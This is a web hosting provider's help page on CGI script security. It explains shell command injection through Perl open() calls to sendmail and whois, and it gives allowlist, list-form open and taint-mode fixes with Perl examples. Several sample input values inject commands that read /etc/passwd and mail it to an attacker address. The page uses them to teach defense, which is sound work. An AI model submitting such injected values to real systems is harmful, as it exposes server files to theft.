CGI Security

Introduction
A common problem with contributed or free CGI scripts allows an attacker to execute arbitrary shell commands on your Virtual Private Server with all of the privileges you would have at a command prompt (such as when you Telnet or SSH to your Virtual Private Server). It may then be possible for the attacker to gain privileged access to your Virtual Private Server. The problem lies in how the scripts are written, not in the overall security of the Virtual Private Server itself.

We strongly advise you to check all scripts you download from a third-party source.

You should specifically look for places where the script opens a file handle to an external program, such as a mail executable (a common task). When such a file handle is opened using user-supplied data, you should ensure that the data have been properly "sanitized" before they reach the command line.

 

Vulnerabilities
For example, you may have a script which packages user-supplied data and e-mails it to a recipient. Perhaps it looks something like:

open (MAIL, "|/bin/sendmail $recipient");
print MAIL "To: $recipient\n";
print MAIL "From: $from\n";    # $from: sender address; the variable name is assumed, the page's own was lost
.
.
.
close(MAIL);

The above code is open to attack because $recipient is interpolated into a command string. Whenever that string contains shell metacharacters, Perl passes it to /bin/sh, and the shell treats ";" or "&&" as a command separator. The attack would be accomplished by submitting for the value of "recipient" something like the following:

some@email.address; cat /etc/passwd | mail attacker@email.address
some@email.address && mail attacker@email.address < /etc/passwd

The easiest way to deny an attack in this particular example is to eliminate user-supplied data from the open command. The sendmail program has a very useful flag, -t, which when set forces sendmail to read the message headers (To:, Cc:, Bcc:) for recipients. So instead of:

open (MAIL, "|/bin/sendmail $recipient");

you write:

open (MAIL, "|/bin/sendmail -t");

and let the To: header you print carry the recipient. Note that this moves the recipient into the message headers rather than out of the attacker's reach entirely: because -t takes recipients from the headers, a value containing a newline can append headers of the attacker's choosing (a Bcc:, for instance), so the recipient must still be checked as described under "Sanitizing Input".

The same pattern appears in any script that runs a program on something the user typed. A whois lookup, for example, might be opened as:

open (WHOIS, "/bin/whois $domain_name |");

This code is prone to the same attack, accomplished by submitting for the value of "domain_name" something like the following:

domain.name; cat /etc/passwd | mail attacker@email.address
domain.name && mail attacker@email.address < /etc/passwd
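To see the injection happen without mailing anyone, the following added example (not code from the original page) uses /bin/echo as a stand-in for sendmail or whois. It runs the same constructed attacker string through the one-string form of open(), which Perl hands to /bin/sh because of the ";", and through the list form of open(), which executes the program directly with no shell involved.

```perl
#!/usr/bin/perl
# Added example, not from the original page: why interpolating user input
# into a one-string open() is exploitable, and why the list form is not.
# /bin/echo stands in for sendmail or whois so the demo is harmless.
use strict;
use warnings;

# Constructed attacker input, in the shape the page describes.
my $recipient = 'some@email.address; echo INJECTED-COMMAND-RAN';

# Vulnerable form: one command string. Because it contains a shell
# metacharacter (';'), Perl runs it via /bin/sh -c, which executes echo
# and then the attacker's second command. Same behaviour as the page's
# open(MAIL, "|/bin/sendmail $recipient"), only in the read direction.
sub run_string_form {
    my ($input) = @_;
    open(my $fh, '-|', "/bin/echo $input") or die "open: $!";
    my @lines = <$fh>;
    close($fh);
    return @lines;
}

# Safe form: program and arguments as a list. No shell is involved, so the
# whole string reaches echo as one argument and is printed literally.
sub run_list_form {
    my ($input) = @_;
    open(my $fh, '-|', '/bin/echo', $input) or die "open: $!";
    my @lines = <$fh>;
    close($fh);
    return @lines;
}

print "string form:\n", run_string_form($recipient);
# -> some@email.address
#    INJECTED-COMMAND-RAN
print "list form:\n", run_list_form($recipient);
# -> some@email.address; echo INJECTED-COMMAND-RAN
```

The list form works in the write direction too: open(my $mail, '|-', '/bin/sendmail', '-t') starts sendmail directly, so even a recipient full of metacharacters can never become a second command. Combine it with the input checks from the next section rather than relying on either alone.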

 

Sanitizing Input
The best way to prevent these types of attacks from being successful is to "sanitize" user-supplied data: decide which characters the value legitimately needs and reject anything that contains a character outside that set. So, in the whois example above, it would be very wise to check "domain_name" against a valid character set consisting of letters, digits, dashes, and periods. This can be accomplished using just a few lines of Perl code:

if ($domain_name =~ /[^A-Za-z0-9.-]/) {
  print "Content-type: text/plain\n\n";
  print "Uh... you entered an invalid domain name.";
  exit(0);
}
open (WHOIS, "/bin/whois $domain_name |");
.
.
.
close(WHOIS);
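The following added example (not code from the original page) carries the allowlist idea through for both cases discussed on this page: the whois lookup on a domain name, and the mail form that uses "sendmail -t". The check functions, the extra leading-dash rule, and the e-mail pattern are this example's own choices; the page only specifies the domain-name character set.

```perl
#!/usr/bin/perl
# Added example, not from the original page: input checks for a whois
# lookup and for a "sendmail -t" mail form. User data never reaches a
# shell (list-form open) and can never add a mail header (no CR/LF).
use strict;
use warnings;

# Domain name allowlist: letters, digits, dots and dashes, as on the page,
# plus a length cap and a ban on a leading dash, which whois would
# otherwise read as a command-line option. Returns the value or undef.
sub clean_domain_name {
    my ($name) = @_;
    return undef unless defined $name;
    return undef if length($name) > 253;
    return undef if $name =~ /[^A-Za-z0-9.-]/;
    return undef if $name =~ /^-/;
    return $name;
}

# Recipient allowlist. What matters for "sendmail -t" is that CR and LF
# cannot get through: -t takes recipients from the headers, so a newline
# in the value would let the submitter append a Bcc: line of their own.
sub clean_email_address {
    my ($addr) = @_;
    return undef unless defined $addr;
    return undef if length($addr) > 254;
    return undef if $addr !~ /^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/;
    return $addr;
}

# Build the sendmail argument list (no shell string) and the message.
# A caller runs it with:  open(my $mail, '|-', @$argv) and prints $msg.
sub build_mail {
    my ($to, $subject, $body) = @_;
    my $addr = clean_email_address($to) // die "bad recipient\n";
    $subject =~ s/[^\x20-\x7e]//g;      # header line: printable ASCII only
    my @argv = ('/bin/sendmail', '-t');
    my $msg  = "To: $addr\nSubject: $subject\n\n$body\n";
    return (\@argv, $msg);
}

# Constructed inputs: one honest value and hostile ones for each check.
for my $d ('gsp.com', 'gsp.com; cat /etc/passwd', '--help') {
    printf "%-28s => %s\n", $d,
        defined clean_domain_name($d) ? 'accepted' : 'rejected';
}
for my $r ('user@example.com', "user\@example.com\nBcc: attacker\@example.net") {
    (my $shown = $r) =~ s/\n/\\n/g;
    printf "%-45s => %s\n", $shown,
        defined clean_email_address($r) ? 'accepted' : 'rejected';
}
my ($argv, $msg) = build_mail('user@example.com', "Hello\r\nBcc: x", 'body');
print "argv: @$argv\n$msg";
```

Run under perl -T as well: taint mode makes Perl die if a value that came from the request reaches exec or a shell before a regular-expression match has extracted a clean copy, which catches any open() that the allowlist check was forgotten for.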

All of the scripts in our CGI Library use proper security sanitizing methods. Although we cannot guarantee the security of all other Virtual Private Servers add-ons, we have examined and corrected some problems we have encountered. We also pay close attention to CERT advisories and bulletins that have applicability to our Virtual Private Servers System.

 

Other Resources
More information about proper CGI security is presented (including examples of specific programming techniques) at the following URLs:


Toll Free 1-866-GSP-4400 • 1-301-464-9363 • service@gsp.com
Copyright © 1994-2016 GSP Services, Inc.